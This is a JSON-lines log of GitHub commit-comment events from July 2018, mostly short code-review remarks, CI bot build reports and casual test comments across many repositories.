{"id":"7926947958","type":"CommitCommentEvent","actor":{"login":"aKaravanov"},"repo":{"name":"aKaravanov/funny-waves"},"payload":{"comment":{"id":29616749,"position":null,"line":null,"path":null,"commit_id":"a222222c6106d563c8d387fec0cf83c34b18834e","created_at":"2018-07-06T05:41:52Z","updated_at":"2018-07-06T05:41:52Z","author_association":"OWNER","body":"Changed the closeness system. Now the background corresponds to the closeness to the right answer."}},"created_at":"2018-07-06T05:41:52Z"}
{"id":"7926948290","type":"CommitCommentEvent","actor":{"login":"webknjaz"},"repo":{"name":"aio-libs/aiozmq"},"payload":{"comment":{"id":29616750,"position":42,"line":62,"path":".travis.yml","commit_id":"1831e227e31d9887d25d06f6a337f6ca32d51e84","created_at":"2018-07-06T05:42:00Z","updated_at":"2018-07-06T05:42:00Z","author_association":"MEMBER","body":"Please change it to 3.6 to match if-clause "}},"created_at":"2018-07-06T05:42:00Z"}
{"id":"7926952931","type":"CommitCommentEvent","actor":{"login":"webknjaz"},"repo":{"name":"aio-libs/aiozmq"},"payload":{"comment":{"id":29616755,"position":null,"line":null,"path":null,"commit_id":"1831e227e31d9887d25d06f6a337f6ca32d51e84","created_at":"2018-07-06T05:43:53Z","updated_at":"2018-07-06T05:43:53Z","author_association":"MEMBER","body":"Oh, and for \"suggested by\" there's `Co-authored-by: Sviatoslav Sydorenko <wk@sydorenko.org.ua>` trailer, which is effectively recognized by GitHub :)\r\nJFYI"}},"created_at":"2018-07-06T05:43:53Z"}
{"id":"7926958142","type":"CommitCommentEvent","actor":{"login":"JelleZijlstra"},"repo":{"name":"aio-libs/aiozmq"},"payload":{"comment":{"id":29616761,"position":null,"line":null,"path":null,"commit_id":"1831e227e31d9887d25d06f6a337f6ca32d51e84","created_at":"2018-07-06T05:45:54Z","updated_at":"2018-07-06T05:45:54Z","author_association":"COLLABORATOR","body":"Thanks! I'll apply your suggestions, but first want to see what happens in https://travis-ci.com/aio-libs/aiozmq/builds/78258407?utm_source=github_status&utm_medium=notification."}},"created_at":"2018-07-06T05:45:54Z"}
{"id":"7926958296","type":"CommitCommentEvent","actor":{"login":"vermorel"},"repo":{"name":"Lokad/Adrien"},"payload":{"comment":{"id":29616762,"position":9,"line":8,"path":"src/spikes/2/Adrien.Base/Compiler/IVariable.cs","commit_id":"2484b32164f8ed7f0e02f8323366242ad2d9ccd3","created_at":"2018-07-06T05:45:58Z","updated_at":"2018-07-06T05:45:58Z","author_association":"MEMBER","body":"Nice use of the latest C# features."}},"created_at":"2018-07-06T05:45:58Z"}
{"id":"7926959077","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29616763,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-06T05:46:16Z","updated_at":"2018-07-06T05:46:16Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2306 of 2306 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.png)</a>\n"}},"created_at":"2018-07-06T05:46:16Z"}
{"id":"7926962907","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29616776,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-06T05:47:43Z","updated_at":"2018-07-06T05:47:43Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T05:47:43Z"}
{"id":"7926967328","type":"CommitCommentEvent","actor":{"login":"cheatfate"},"repo":{"name":"status-im/nim-asyncdispatch2"},"payload":{"comment":{"id":29616792,"position":null,"line":null,"path":null,"commit_id":"4911d25807d8943e7dbecb7c5f442ef597a8dd3b","created_at":"2018-07-06T05:49:24Z","updated_at":"2018-07-06T05:49:24Z","author_association":"COLLABORATOR","body":"@zah could you please explain this change? Or at least could you provide some example?"}},"created_at":"2018-07-06T05:49:24Z"}
{"id":"7926973795","type":"CommitCommentEvent","actor":{"login":"vermorel"},"repo":{"name":"Lokad/Adrien"},"payload":{"comment":{"id":29616809,"position":19,"line":37,"path":"src/spikes/2/Adrien.Core/Notation/TensorConstructors.tt","commit_id":"629b90513f8c4c6646ce103423c5628c84871f57","created_at":"2018-07-06T05:51:46Z","updated_at":"2018-07-06T05:51:46Z","author_association":"MEMBER","body":"100 feels a bit overkill. The resulting `TensorConstructors.cs` is 1.3 MB large. I would rather suggest to keep it at 10, which is already very large as far tensor goes."}},"created_at":"2018-07-06T05:51:46Z"}
{"id":"7926974447","type":"CommitCommentEvent","actor":{"login":"Tribal1012"},"repo":{"name":"Tribal1012/mipsHex"},"payload":{"comment":{"id":29616813,"position":14,"line":23,"path":"mipsHex/asm_type/mips_asm_set.py","commit_id":"0da76ec7238c56c2509e9bba0e42f297b757ae50","created_at":"2018-07-06T05:52:00Z","updated_at":"2018-07-06T05:52:00Z","author_association":"OWNER","body":"remove ')' at \")? True:False\""}},"created_at":"2018-07-06T05:52:00Z"}
{"id":"7926976581","type":"CommitCommentEvent","actor":{"login":"chelmuth"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":29616815,"position":89,"line":89,"path":"repos/gems/src/lib/vfs/init/plugin.cc","commit_id":"f916dca2f994e7b998c767b74ef8c8e7ee08b616","created_at":"2018-07-06T05:52:46Z","updated_at":"2018-07-06T05:52:46Z","author_association":"NONE","body":"Perfect application for the `Vfs_handle::Guard` and which would also justify the nested scope ;-)"}},"created_at":"2018-07-06T05:52:46Z"}
{"id":"7926978600","type":"CommitCommentEvent","actor":{"login":"NunchuckFusion"},"repo":{"name":"cyberSizzle/Honey_BadgersDGAF"},"payload":{"comment":{"id":29616819,"position":2,"line":4,"path":"external_ip.py","commit_id":"a1e0ac54d24c1ca3a0a389725daf06b7987d7704","created_at":"2018-07-06T05:53:32Z","updated_at":"2018-07-06T05:53:32Z","author_association":"COLLABORATOR","body":"3 \" in python starts a comment block"}},"created_at":"2018-07-06T05:53:32Z"}
{"id":"7926981204","type":"CommitCommentEvent","actor":{"login":"komagata"},"repo":{"name":"fjordllc/bootcamp"},"payload":{"comment":{"id":29616823,"position":5,"line":16,"path":"app/models/report.rb","commit_id":"be5b4e9b0f387ebd13fd3cbf3537aec2271af9c0","created_at":"2018-07-06T05:54:31Z","updated_at":"2018-07-06T05:54:31Z","author_association":"MEMBER","body":"Reportクラスなのでreportが重複しています。previousでいいです。"}},"created_at":"2018-07-06T05:54:31Z"}
{"id":"7926982916","type":"CommitCommentEvent","actor":{"login":"webknjaz"},"repo":{"name":"aio-libs/aiozmq"},"payload":{"comment":{"id":29616824,"position":null,"line":null,"path":null,"commit_id":"1831e227e31d9887d25d06f6a337f6ca32d51e84","created_at":"2018-07-06T05:55:11Z","updated_at":"2018-07-06T05:55:11Z","author_association":"MEMBER","body":"3.7 job will be red, but then grey message under \"Test\" stage (before \"Deploy ...\") appears saying that it's allowed to fail and the build outcome will be green after \"Deploy\" finishes. After my suggested changes there will be no Deploy unless the build is for tagged commit"}},"created_at":"2018-07-06T05:55:11Z"}
{"id":"7926984787","type":"CommitCommentEvent","actor":{"login":"komagata"},"repo":{"name":"fjordllc/bootcamp"},"payload":{"comment":{"id":29616825,"position":6,"line":17,"path":"app/models/report.rb","commit_id":"be5b4e9b0f387ebd13fd3cbf3537aec2271af9c0","created_at":"2018-07-06T05:55:52Z","updated_at":"2018-07-06T05:55:52Z","author_association":"MEMBER","body":"idは記事が作られた順番を表しているとは限らないのでcreated_atとかがいいですね。\r\n\r\n最近の仕事ではだいたいuuid使ってます。\r\n\r\n[rails\\+postgresでidにuuidを使う \\- komagataのブログ](http://docs.komagata.org/5455)"}},"created_at":"2018-07-06T05:55:52Z"}
{"id":"7926988962","type":"CommitCommentEvent","actor":{"login":"komagata"},"repo":{"name":"fjordllc/bootcamp"},"payload":{"comment":{"id":29616842,"position":5,"line":63,"path":"app/views/reports/_report.html.slim","commit_id":"be5b4e9b0f387ebd13fd3cbf3537aec2271af9c0","created_at":"2018-07-06T05:57:18Z","updated_at":"2018-07-06T05:57:18Z","author_association":"MEMBER","body":"`link_to`にはmodelのインスタンス渡すだけでよいはずですー"}},"created_at":"2018-07-06T05:57:18Z"}
{"id":"7926991424","type":"CommitCommentEvent","actor":{"login":"komagata"},"repo":{"name":"fjordllc/bootcamp"},"payload":{"comment":{"id":29616847,"position":13,"line":88,"path":"db/schema.rb","commit_id":"be5b4e9b0f387ebd13fd3cbf3537aec2271af9c0","created_at":"2018-07-06T05:58:11Z","updated_at":"2018-07-06T05:58:11Z","author_association":"MEMBER","body":"これは？"}},"created_at":"2018-07-06T05:58:11Z"}
{"id":"7926999765","type":"CommitCommentEvent","actor":{"login":"ckoparir"},"repo":{"name":"ckoparir/github-slideshow"},"payload":{"comment":{"id":29616871,"position":null,"line":null,"path":null,"commit_id":"1d227e2ad8b43e1c42aab60e239d813a406bc4e3","created_at":"2018-07-06T06:01:02Z","updated_at":"2018-07-06T06:01:02Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-06T06:01:02Z"}
{"id":"7927001258","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29616877,"position":null,"line":null,"path":null,"commit_id":"bfb5e7670bf35b0559472163134c37a5363468bd","created_at":"2018-07-06T06:01:34Z","updated_at":"2018-07-06T06:01:34Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - Win64-Windows-7-VisualStudio-14: OK (2931 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-06T06:01:34Z"}
{"id":"7927001990","type":"CommitCommentEvent","actor":{"login":"hjgode"},"repo":{"name":"hjgode/rdesktop-ce"},"payload":{"comment":{"id":29616878,"position":null,"line":null,"path":null,"commit_id":"b85afd4d15748936a208273f4486d0edef562311","created_at":"2018-07-06T06:01:50Z","updated_at":"2018-07-06T06:01:50Z","author_association":"OWNER","body":"this is r41"}},"created_at":"2018-07-06T06:01:50Z"}
{"id":"7927004560","type":"CommitCommentEvent","actor":{"login":"Compro-Prasad"},"repo":{"name":"Nate-Wilkins/dotfiles"},"payload":{"comment":{"id":29616880,"position":2,"line":2,"path":"bin/EDITOR","commit_id":"4c28e2d481d69832e83f686ebcaa246ff862d7a8","created_at":"2018-07-06T06:02:44Z","updated_at":"2018-07-06T06:02:44Z","author_association":"NONE","body":"I found a better implementation of this:\r\n```\r\nif test -e \"/tmp/emacs1000/server\" || test -e \"~/.emacs.d/server\"; then\r\n    emacsclient -c \"$@\"\r\nelse\r\n    emacs --eval=\"(server-start)\" \"$@\"\r\nfi\r\n```\r\nSince, you are using spacemacs you might need to modify the path of the server file. I also have set this executable to my launch icon on GNU/Linux which launches new Emacs frames that shares the same instance."}},"created_at":"2018-07-06T06:02:44Z"}
{"id":"7927005759","type":"CommitCommentEvent","actor":{"login":"MacOSO"},"repo":{"name":"blurtech/event-sharing-backend"},"payload":{"comment":{"id":29616882,"position":null,"line":null,"path":null,"commit_id":"1f5742069fb290499e6a55bb4d2cef84ac8f115b","created_at":"2018-07-06T06:03:08Z","updated_at":"2018-07-06T06:03:08Z","author_association":"MEMBER","body":"Dafaq? I will not return you a single response."}},"created_at":"2018-07-06T06:03:08Z"}
{"id":"7927013416","type":"CommitCommentEvent","actor":{"login":"Edgarjin"},"repo":{"name":"Edgarjin/helloworld"},"payload":{"comment":{"id":29616909,"position":null,"line":null,"path":null,"commit_id":"153f4feac654d41c1891b658721bdc92b63cae70","created_at":"2018-07-06T06:05:48Z","updated_at":"2018-07-06T06:05:48Z","author_association":"OWNER","body":"hello world aaa"}},"created_at":"2018-07-06T06:05:48Z"}
{"id":"7927013596","type":"CommitCommentEvent","actor":{"login":"Compro-Prasad"},"repo":{"name":"Nate-Wilkins/dotfiles"},"payload":{"comment":{"id":29616910,"position":2,"line":2,"path":"bin/EDITOR","commit_id":"4c28e2d481d69832e83f686ebcaa246ff862d7a8","created_at":"2018-07-06T06:05:52Z","updated_at":"2018-07-06T06:05:52Z","author_association":"NONE","body":"What is the use of `$!` ?"}},"created_at":"2018-07-06T06:05:52Z"}
{"id":"7927017341","type":"CommitCommentEvent","actor":{"login":"duetosymmetry"},"repo":{"name":"Juststringthings/web-site"},"payload":{"comment":{"id":29616918,"position":6,"line":1,"path":"README.md","commit_id":"dd874cce0dfcf8c1ad152ce398099016f0f66461","created_at":"2018-07-06T06:07:11Z","updated_at":"2018-07-06T06:07:11Z","author_association":"NONE","body":"Sorry about the spaghetti code for that project. There are far better ways to do that (e.g. MVC framework), I just never went back to clean it up..."}},"created_at":"2018-07-06T06:07:11Z"}
{"id":"7927034029","type":"CommitCommentEvent","actor":{"login":"prashmeh"},"repo":{"name":"mitmehta/myCcode"},"payload":{"comment":{"id":29616950,"position":null,"line":null,"path":null,"commit_id":"aabb82fcffe8ae61e8bb98f0e1ff019fd5f28cdc","created_at":"2018-07-06T06:13:01Z","updated_at":"2018-07-06T06:13:01Z","author_association":"CONTRIBUTOR","body":"I think the question was to get the first unique element from the string.\r\nThe code seems perfect with the edge cases well handled."}},"created_at":"2018-07-06T06:13:01Z"}
{"id":"7927035564","type":"CommitCommentEvent","actor":{"login":"MarcelWaldvogel"},"repo":{"name":"jsxc/jsxc"},"payload":{"comment":{"id":29616951,"position":15,"line":1367,"path":"src/jsxc.lib.muc.js","commit_id":"abcf3e6027099c3c8d1304de09b112ded606f16a","created_at":"2018-07-06T06:13:32Z","updated_at":"2018-07-06T06:13:32Z","author_association":"CONTRIBUTOR","body":"Can there never be a body AND and attachment?"}},"created_at":"2018-07-06T06:13:32Z"}
{"id":"7927040662","type":"CommitCommentEvent","actor":{"login":"prashmeh"},"repo":{"name":"mitmehta/myCcode"},"payload":{"comment":{"id":29616962,"position":9,"line":9,"path":"kthLargestElement.cpp","commit_id":"1a444f6aa8a6448bfcfda4275b92af57da98554e","created_at":"2018-07-06T06:15:20Z","updated_at":"2018-07-06T06:15:20Z","author_association":"CONTRIBUTOR","body":"\r\nThis is a naive solution. We can have a better solution using binary `quick-select` algorithm or by using modified `heap sort`. "}},"created_at":"2018-07-06T06:15:20Z"}
{"id":"7927041269","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29616964,"position":1,"line":1,"path":".idea/workspace.xml","commit_id":"e92b34b7c60110358e6a072c1e6cc78fdfb959fa","created_at":"2018-07-06T06:15:32Z","updated_at":"2018-07-06T06:15:32Z","author_association":"NONE","body":"Remove this file"}},"created_at":"2018-07-06T06:15:32Z"}
{"id":"7927041996","type":"CommitCommentEvent","actor":{"login":"wbSD"},"repo":{"name":"peterhaneve/evemon"},"payload":{"comment":{"id":29616966,"position":33,"line":66,"path":"src/EVEMon/BlankCharacter/BlankCharacterControl.cs","commit_id":"446be763d115d3994ca3a67ae2e3a866d04b2210","created_at":"2018-07-06T06:15:47Z","updated_at":"2018-07-06T06:15:47Z","author_association":"NONE","body":"@peterhaneve I think that line should stay there"}},"created_at":"2018-07-06T06:15:47Z"}
{"id":"7927044046","type":"CommitCommentEvent","actor":{"login":"chuxiaXBB"},"repo":{"name":"songsongDBB/tata"},"payload":{"comment":{"id":29616975,"position":null,"line":null,"path":null,"commit_id":"a185015350d7918e50cf44a071afef586c5b1a71","created_at":"2018-07-06T06:16:27Z","updated_at":"2018-07-06T06:16:27Z","author_association":"COLLABORATOR","body":"cool"}},"created_at":"2018-07-06T06:16:27Z"}
{"id":"7927045891","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29616978,"position":10,"line":14,"path":"app/router.js","commit_id":"3f6672a1aef674a05526af5082ebe50f55854dc7","created_at":"2018-07-06T06:17:05Z","updated_at":"2018-07-06T06:17:05Z","author_association":"NONE","body":"Are you using task route "}},"created_at":"2018-07-06T06:17:05Z"}
{"id":"7927047550","type":"CommitCommentEvent","actor":{"login":"4xdk"},"repo":{"name":"PursuanceProject/pursuance"},"payload":{"comment":{"id":29616980,"position":6,"line":244,"path":"src/components/Content/RightPanel/TaskList/TaskList.js","commit_id":"f795c761ec23179410d5c1e00ebf09fd513bb9e1","created_at":"2018-07-06T06:17:38Z","updated_at":"2018-07-06T06:17:38Z","author_association":"COLLABORATOR","body":"(facepalm) :D"}},"created_at":"2018-07-06T06:17:38Z"}
{"id":"7927050448","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29616986,"position":36,"line":36,"path":"app/components/list-comp.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:18:38Z","updated_at":"2018-07-06T06:18:38Z","author_association":"NONE","body":"Remove this line"}},"created_at":"2018-07-06T06:18:38Z"}
{"id":"7927051101","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29616987,"position":52,"line":52,"path":"app/components/list-comp.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:18:51Z","updated_at":"2018-07-06T06:18:51Z","author_association":"NONE","body":"Remove un unsed function"}},"created_at":"2018-07-06T06:18:51Z"}
{"id":"7927051541","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29616991,"position":11,"line":11,"path":"app/components/task-comp.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:19:01Z","updated_at":"2018-07-06T06:19:01Z","author_association":"NONE","body":"Remove line"}},"created_at":"2018-07-06T06:19:01Z"}
{"id":"7927052273","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29616992,"position":13,"line":13,"path":"app/components/task-comp.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:19:15Z","updated_at":"2018-07-06T06:19:15Z","author_association":"NONE","body":"Use `getProperties`"}},"created_at":"2018-07-06T06:19:15Z"}
{"id":"7927052917","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29616995,"position":30,"line":30,"path":"app/components/task-comp.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:19:27Z","updated_at":"2018-07-06T06:19:27Z","author_association":"NONE","body":"Do not use Id"}},"created_at":"2018-07-06T06:19:27Z"}
{"id":"7927053492","type":"CommitCommentEvent","actor":{"login":"zhutaiyong"},"repo":{"name":"zhutaiyong/zty01"},"payload":{"comment":{"id":29616998,"position":null,"line":null,"path":null,"commit_id":"78da84d17ec28d9d4b81d49bb87d090c0c975b15","created_at":"2018-07-06T06:19:38Z","updated_at":"2018-07-06T06:19:38Z","author_association":"OWNER","body":"jjj"}},"created_at":"2018-07-06T06:19:38Z"}
{"id":"7927054231","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29616999,"position":43,"line":43,"path":"app/components/task-comp.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:19:53Z","updated_at":"2018-07-06T06:19:53Z","author_association":"NONE","body":"Y are u using `findRecord `"}},"created_at":"2018-07-06T06:19:53Z"}
{"id":"7927054718","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29617001,"position":8,"line":8,"path":"app/controllers/application.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:20:03Z","updated_at":"2018-07-06T06:20:03Z","author_association":"NONE","body":"No empty line"}},"created_at":"2018-07-06T06:20:03Z"}
{"id":"7927054977","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29617002,"position":10,"line":10,"path":"app/controllers/application.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:20:08Z","updated_at":"2018-07-06T06:20:08Z","author_association":"NONE","body":"same"}},"created_at":"2018-07-06T06:20:08Z"}
{"id":"7927055429","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29617004,"position":4,"line":4,"path":"app/controllers/home.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:20:16Z","updated_at":"2018-07-06T06:20:16Z","author_association":"NONE","body":"same"}},"created_at":"2018-07-06T06:20:16Z"}
{"id":"7927055746","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29617013,"position":6,"line":6,"path":"app/controllers/home.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:20:22Z","updated_at":"2018-07-06T06:20:22Z","author_association":"NONE","body":"NEL"}},"created_at":"2018-07-06T06:20:22Z"}
{"id":"7927055993","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29617021,"position":8,"line":8,"path":"app/controllers/home.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:20:27Z","updated_at":"2018-07-06T06:20:27Z","author_association":"NONE","body":"NEL"}},"created_at":"2018-07-06T06:20:27Z"}
{"id":"7927056414","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29617030,"position":6,"line":6,"path":"app/controllers/list.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:20:35Z","updated_at":"2018-07-06T06:20:35Z","author_association":"NONE","body":"NEL"}},"created_at":"2018-07-06T06:20:35Z"}
{"id":"7927058028","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29617034,"position":31,"line":31,"path":"app/controllers/list.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:21:08Z","updated_at":"2018-07-06T06:21:08Z","author_association":"NONE","body":"Needed empty line"}},"created_at":"2018-07-06T06:21:08Z"}
{"id":"7927059203","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29617039,"position":67,"line":67,"path":"app/controllers/list.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:21:31Z","updated_at":"2018-07-06T06:21:31Z","author_association":"NONE","body":"y are y using like this\r\n"}},"created_at":"2018-07-06T06:21:31Z"}
{"id":"7927061969","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29617042,"position":7,"line":7,"path":"app/models/list.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:22:24Z","updated_at":"2018-07-06T06:22:24Z","author_association":"NONE","body":"Difference between `async: false` vs `async: true`"}},"created_at":"2018-07-06T06:22:24Z"}
{"id":"7927062805","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29617043,"position":7,"line":7,"path":"app/models/task.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:22:39Z","updated_at":"2018-07-06T06:22:39Z","author_association":"NONE","body":"What is inverse"}},"created_at":"2018-07-06T06:22:39Z"}
{"id":"7927064568","type":"CommitCommentEvent","actor":{"login":"harip0200"},"repo":{"name":"SoundaryaRagu/em-todo"},"payload":{"comment":{"id":29617046,"position":9,"line":15,"path":"app/router.js","commit_id":"cc291a7fdb16cc96c8951b320ab847cd2ff7c773","created_at":"2018-07-06T06:23:13Z","updated_at":"2018-07-06T06:23:13Z","author_association":"NONE","body":"Are u using `task` route"}},"created_at":"2018-07-06T06:23:13Z"}
{"id":"7927065191","type":"CommitCommentEvent","actor":{"login":"abdu2020"},"repo":{"name":"abdu2018/one2"},"payload":{"comment":{"id":29617047,"position":null,"line":null,"path":null,"commit_id":"33b461545646ecd68a6c35a0a328563da9d6d6b3","created_at":"2018-07-06T06:23:24Z","updated_at":"2018-07-06T06:23:24Z","author_association":"CONTRIBUTOR","body":"hhhhhhhh"}},"created_at":"2018-07-06T06:23:24Z"}
{"id":"7927083635","type":"CommitCommentEvent","actor":{"login":"MyamoSama"},"repo":{"name":"vvh-avv/Shop"},"payload":{"comment":{"id":29617085,"position":null,"line":null,"path":null,"commit_id":"91158ab22a96255082b4d50015c2112c9f4a0839","created_at":"2018-07-06T06:29:18Z","updated_at":"2018-07-06T06:29:18Z","author_association":"COLLABORATOR","body":"왜 저만안되죠? 장난하나요?\r\n"}},"created_at":"2018-07-06T06:29:18Z"}
{"id":"7927084644","type":"CommitCommentEvent","actor":{"login":"Drakezul"},"repo":{"name":"OPCFoundation/UA-Java"},"payload":{"comment":{"id":29617087,"position":null,"line":null,"path":null,"commit_id":"0c1c7a402a4f57eabdc014e2a6b286b51aa5673e","created_at":"2018-07-06T06:29:37Z","updated_at":"2018-07-06T06:29:37Z","author_association":"NONE","body":"@bjakke sorry to bother you with this again:\r\nWhat's your though on the encoding of _nsu_ in toString while the _decoding_ in parseExpandedNodeId is _missing_?\r\nI would either like to seperate toString from toXmlEncodedString or to add the decoding to parseExpandedNodeId directly."}},"created_at":"2018-07-06T06:29:37Z"}
{"id":"7927087829","type":"CommitCommentEvent","actor":{"login":"lehug"},"repo":{"name":"ant-design/ant-design-pro"},"payload":{"comment":{"id":29617096,"position":6,"line":21,"path":"src/components/DescriptionList/index.less","commit_id":"24333d5c6dbf622653d76d53fcf41f1df1bf8457","created_at":"2018-07-06T06:30:33Z","updated_at":"2018-07-06T06:30:33Z","author_association":"NONE","body":"这个改动将导致假如Description中，有detail的与没有detail的高度不一样，进而导致row排序错乱"}},"created_at":"2018-07-06T06:30:33Z"}
{"id":"7927088513","type":"CommitCommentEvent","actor":{"login":"gygrazok"},"repo":{"name":"gygrazok/witchmod"},"payload":{"comment":{"id":29617097,"position":7,"line":6,"path":"CHANGES","commit_id":"eb16565813a6672556c6ebc82bf80206393d10ba","created_at":"2018-07-06T06:30:46Z","updated_at":"2018-07-06T06:30:46Z","author_association":"OWNER","body":"Yes (internally the card is moved on top of the deck and then draw)"}},"created_at":"2018-07-06T06:30:46Z"}
{"id":"7927090314","type":"CommitCommentEvent","actor":{"login":"syonajosy"},"repo":{"name":"gastonstat/CreditScoring"},"payload":{"comment":{"id":29617100,"position":null,"line":null,"path":null,"commit_id":"78bec232d45e3b1c5ee2971a3611e3c1fafd1e0f","created_at":"2018-07-06T06:31:21Z","updated_at":"2018-07-06T06:31:21Z","author_association":"NONE","body":"can someone give me that data dictionary for this data please"}},"created_at":"2018-07-06T06:31:21Z"}
